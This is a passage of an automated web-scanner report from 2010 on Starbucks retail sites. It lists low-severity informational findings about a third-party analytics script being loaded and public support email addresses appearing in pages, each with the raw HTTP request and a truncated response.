Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25328
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:40:37 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.84. http://www.starbucksstore.com/products/shprodde.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodde.asp

Issue detail

The response dynamically includes the following script from another domain: http://edge.quantserve.com/quant.js

Request

GET /products/shprodde.asp?SKU=317917 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35039
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:53 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.85. http://www.starbucksstore.com/products/shprodli.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodli.asp

Issue detail

The response dynamically includes the following script from another domain: http://edge.quantserve.com/quant.js

Request

GET /products/shprodli.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14377
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:26 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.86. http://www.starbucksstore.com/products/sitemap.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/sitemap.asp

Issue detail

The response dynamically includes the following script from another domain: http://edge.quantserve.com/quant.js

Request

GET /products/sitemap.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21107
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:41:26 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.87. http://www.starbucksstore.com/products/terms.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/terms.asp

Issue detail

The response dynamically includes the following script from another domain: http://edge.quantserve.com/quant.js

Request

GET /products/terms.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15912
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:44 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.88. http://www.starbucksstore.com/starbucks-coffee-delivery/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-delivery/

Issue detail

The response dynamically includes the following script from another domain: http://edge.quantserve.com/quant.js

Request

GET /starbucks-coffee-delivery/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19530
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:19 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       
       <meta HTTP-EQUIV="Conten
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.89. http://www.starbucksstore.com/starbucks-coffee-tours/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-tours/

Issue detail

The response dynamically includes the following script from another domain: http://edge.quantserve.com/quant.js

Request

GET /starbucks-coffee-tours/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16772
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:05 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.90. http://www.starbucksstore.com/starbucks-gifts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-gifts/

Issue detail

The response dynamically includes the following script from another domain: http://edge.quantserve.com/quant.js

Request

GET /starbucks-gifts/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17195
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:19 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.91. http://www.starbucksstore.com/starbucks-seasonal/starbucks-seasonal.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-seasonal/starbucks-seasonal.asp

Issue detail

The response dynamically includes the following script from another domain: http://edge.quantserve.com/quant.js

Request

GET /starbucks-seasonal/starbucks-seasonal.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79402
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:24 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11. Email addresses disclosed
There are 4 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


11.1. http://www.starbucks.com/customer-service/faqs/coffeehouse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffeehouse

Issue detail

The following email addresses were disclosed in the response: starbuckscardmobile@starbucks.com, info@mystarbucksidea.com

Request

GET /customer-service/faqs/coffeehouse HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:08 GMT
Connection: close
Content-Length: 57890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<p>Some users are experiencing issues logging into their Starbucks Card accounts. Please email us at starbuckscardmobile@starbucks.com and include your username and the time you experienced the issue to help our tech team isolate the issue.</p>
...[SNIP]...
<a href="mailto:info@mystarbucksidea.com">
...[SNIP]...

11.2. http://www.starbucks.com/customer-service/faqs/shop

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/shop

Issue detail

The following email address was disclosed in the response: webmaster@starbucks.com

Request

GET /customer-service/faqs/shop HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:22 GMT
Connection: close
Content-Length: 51351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="mailto:webmaster@starbucks.com">webmaster@starbucks.com</a>
...[SNIP]...

11.3. http://www.starbucks.com/static/js/global.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /static/js/global.js

Issue detail

The following email address was disclosed in the response: brian@cherne.net

Request

GET /static/js/global.js HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e3f5py45fbmdq045dakdnm45; skin=

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 04 Oct 2010 20:52:53 GMT
Accept-Ranges: bytes
ETag: "17df8d1d664cb1:0"
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:12:36 GMT
Content-Length: 30097

/*
hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
<http://cherne.net/brian/resources/jquery.hoverIntent.html>
@param f onMouseOver function || An object with configuration options
@param g onMo
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

11.4. http://www.starbucksstore.com/guestassist/guestassist_jscript.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/guestassist_jscript.js

Issue detail

The following email addresses were disclosed in the response (those visible in the excerpt below): orders@starbucksstore.com, orderchanges@starbucksstore.com, support@starbucksstore.com, returns@starbucksstore.com, products@starbucksstore.com, info@starbucks.com

Request

GET /guestassist/guestassist_jscript.js HTTP/1.1
Accept: */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 09 Dec 2009 20:01:41 GMT
Accept-Ranges: bytes
ETag: "b57fbf6ca79ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:11:50 GMT
Content-Length: 24837

//----------------------------------------------------------------------------
//    Filename:        /GuestAssist/guestassist_jscript.js
//    Description:    this file contains the Guest Assistance subject and t
...[SNIP]...
-------------------    --------------- -----------rac                            
       arrSubTopics = new Array(
                       new Array(new Array("", "", "", 0, "order")),
                       new Array(new Array("I need help tracking my order", "orders@starbucksstore.com", "Order Inquiries - Tracking", 1, "order"),                            
                            new Array("I need to cancel or change my order", "orderchanges@starbucksstore.com", "Order Inquiries - Cancellations/Changes", 2, "order"),
                            new Array("I need help with an order I received.", "orders@starbucksstore.com", "Order Inquiry - Fullfillment Issue", 3, "order"),                            
                            new Array("Other", "orders@starbucksstore.com", "Order Inquiries - Other", 4, "order")),
                           
                       new Array(new Array("How do I subscribe to the StarbucksStore newsletter?", "support@starbucksstore.com", "Newsletters - Subscribe", 1, "other"),
                            new Array("I need to change my email address.", "support@starbucksstore.com", "Newsletters - Change Address", 2, "other"),
                            new Array("Other", "support@starbucksstore.com", "Newsletters - Other", 3,    "other")),
                                       
                       new Array(
                               new Array("How do I pay for my order?", "support@starbucksstore.com", "Shopping - Payment Options", 1, "other"),
                           new Array("How do I complete my order?", "support@starbucksstore.com", "Shopping - Checkout", 2, "other"),
                           new Array("Is your website secure?", "support@starbucksstore.com", "Shopping - Security", 3, "other"),
                           new Array("What do you do with my private information?", "support@starbucksstore.com", "Shopping - Privacy", 4, "other"),
                               new Array("Do you have special offers or coupons?", "support@starbucksstore.com", "Shopping - Special Offers/Discounts", 5, "other"),
                               new Array("Other", "support@starbucksstore.com", "Shopping - Other", 6, "other")),

                       new Array(new Array("Shipping options and rates.", "support@starbucksstore.com", "Shipping - Options/Rates", 1, "other"),
                            new Array("Do you ship to international locations?", "support@starbucksstore.com", "Shipping - International", 2, "other"),
                            new Array("Other", "support@starbucksstore.com", "Shipping - Other", 3, "other")),                            
                                                                                           
                       new Array(new Array("How to return products", "returns@starbucksstore.com", "Returns - Process", 1, "returns"),
                            new Array("When will I receive my credit?", "returns@starbucksstore.com", "Returns - Process", 2, "returns"),
                            new Array("Have you received a product I recently returned?", "returns@starbucksstore.com", "Returns - Inquiry", 3, "returns"),                            
                            new Array("Other", "returns@starbucksstore.com", "Returns - Other", 4, "returns")),                
                           
                       new Array(new Array("Questions about coffee origins.", "products@starbucksstore.com", "Product - General Information", 1, "other"),
                            new Array("Where do I find nutrition information?", "products@starbucksstore.com", "Product - General Information", 2, "other"),
                            new Array("Question about coffee.", "info@starbucks.com", "Product - General Information", 3, "other"),
                            new Array("Question about coffee accessories.", "info@starbucks.com", "Product - General Information", 4, "other"),
                            new Array("Question about other Starbucks products.", "info@starbucks.com", "Product - General Information", 5, "other"),
                            new Array("Replacement parts or product warranty.", "info@starbucks.com", "Product - General Information", 6, "other"),
                            new Array("Question about Starbucks Music", "info@starbucks.com", "Product - General Information", 7, "other"),
                            new Array("Other", "products@starbucksstore.com", "Product - Other", 8, "other")),

                       new Array(new Array("Change payment method", "support@starbucksstore.com", "Payment - Change payment method", 1, "other"),
                            new Array("Billing problems", "orders@starbucksstore.com", "Payment - Billing problems", 2, "other"),
                            new Array("Payment options", "support@starbucksstore.com", "Payment - Payment options", 3, "other")),                            

                       new Array(new Array("Why is an account required?", "support@starbucksstore.com", "My Account - Required", 1, "other"),
                            new Array("I forgot my password.", "support@starbucksstore.com", "My Account - Forgot Password", 2, "other"),
                            new Array("How can I change my personal information?", "support@starbucksstore.com", "My Account - Update Email Address", 3, "other"),
                            new Array("How do I create an account?", "support@starbucksstore.com", "My Account - Creating", 4, "other"),
                            new Array("How do I modify my address book?", "support@starbucksstore.com", "My Account - Address Book", 5, "other"),
                            new Array("What do you do with my private information?", "support@starbucksstore.com", "My Account - Privacy", 6, "other"),
                            new Array("May I automatically reorder?", "orders@starbucksstore.com", "My Account - Automatic Reorder", 7, "other"),
                            new Array("Reset my password", "support@starbucksstore.com", "My Account - Reset my password", 8, "other"),
                            new Array("Change my email address", "support@starbucksstore.com", "My Account - Change my email address", 9, "other"),
                            new Array("Help creating an account", "support@starbucksstore.com", "My Account - Help creating an account", 10, "other"),
                            new Array("Modify my address information", "support@starbucksstore.com", "My Account - Modify my address information", 11, "other")),
                                                       
                       new Array(
                            new Array("Error message during checkout.", "support@starbucksstore.com", "Technical Support - Error message during checkout", 1, "other"),
                            new Array("Other error message.", "support@starbucksstore.com", "Technical Support - Other error message", 2, "other"),
                            new Array("Something looks wrong on my screen.", "support@starbucksstore.com", "Technical Support - Something looks wrong on my screen", 3, "other"),
                            new Array("Printing problems.", "support@starbucksstore.com", "Technical Support - Printing problems", 3, "other"),
                            new Array("I cannot complete my order.", "support@starbucksstore.com", "Technical Support - I cannot complete my order", 4, "other"),
                            new Array("I received an error message.", "support@starbucksstore.com", "Technical Support - Error Message", 5, "other"),
                            new Array("Other", "support@starbucksstore.com", "Technical Support - Other", 6, "other")),
                           
                       new Array(
                               new Array("How do I purchase a gift certificate?", "support@starbucksstore.com", "GC - Purchase GC", 1, "other"),
                           new Array("Starbucks card", "info@starbucks.com", "GC - Starbucks Card", 2, "other"),
                           new Array("How do I get coupons?", "support@starbucksstore.com", "GC - Coupons", 3, "other"),
                           new Array("Problem using my gift certificate", "support@starbucksstore.com", "GC - Using GC", 4, "other"),
                               new Array("Problem using my coupon", "support@starbucksstore.com", "GC - Coupon", 5, "other")),

                       new Array(new Array("Where do I send Marketing proposals?", "support@starbucksstore.com", "Business Services - Marketing", 1, "other"),
                            new Array("Where do I send product samples?", "support@starbucksstore.com", "Business Services - Samples", 2, "other"),
                            new Array("Do you have an Affiliate Program?", "support@starbucksstore.com", "Business Services - Affiliate Program", 3, "other"),
                            new Array("Do you have an automatic reorder program?", "support@starbucksstore.com", "Business Services - Automatic Reorder", 4, "other"),
                            new Array("May we advertise on your site?", " advertising@starbucksstore.com", "Business Services - Advertising", 5, "other"),                            
                            new Array("Public Relations/Media Inquiries", "pr@starbucksstore.com", "Public Relations/Media Inquiries", 6, "other")),

                       new Array(new Array("General Information", "info@starbucks.com", "General Information", 1, "other"),
                            new Array("Starbucks grocery products.", "info@starbucks.com", "Starbucks Grocery Products", 2, "other"),
                            new Array("Starbucks card corporate sales", "info@starbucks.com", "Starbucks Card Corporate Sales", 3, "other"),
                            new Array("Starbucks card", "info@starbucks.com", "Starbucks Card General Information", 4, "other"),
                            new Array("International Development & Overseas Partnership Opportunities", "info@starbucks.com", "International Development & Overseas Partnership Opportunities", 5, "other"),                            
                            new Array("Starbucks.com", "info@starbucks.com", "General", 6, "other"),
                            new Array("Retail store feedback", "info@starbucks.com", "Retail Store Feedback", 7, "other"),
                            new Array("International Retail store feedback", "info@starbucks.com", "International Retail Store Feedback", 8, "other"),
                            new Array("Hear Music feedback", "info@starbucks.com", "Hear Music Feedback", 9, "other")),

                       new Array(new Array("I have feedback about a product.", "support@starbucksstore.com", "Feedback - Products", 1, "other"),
                               new Array("I have feedback about this website.", "support@starbucksstore.com", "Feedback - Website", 2, "other"),
                               new Array("I have general feedback.", "support@starbucksstore.com", "Feedback - Other", 3, "other"),
                               new Array("Retail store feedback", "info@starbucks.com", "Retail Store Feedback", 4, "other"),
                               new Array("International Retail store feedback", "info@starbucks.com", "International Retail Store Feedback", 5, "other"),
                               new Array("Hear Music feedback", "info@starbucks.com", "Hear Music Feedback", 6, "other")),
                               
            new Array(new Array("Advertising", "support@starbucksstore.com", "Advertising - General", 1, "other")),

                &nbs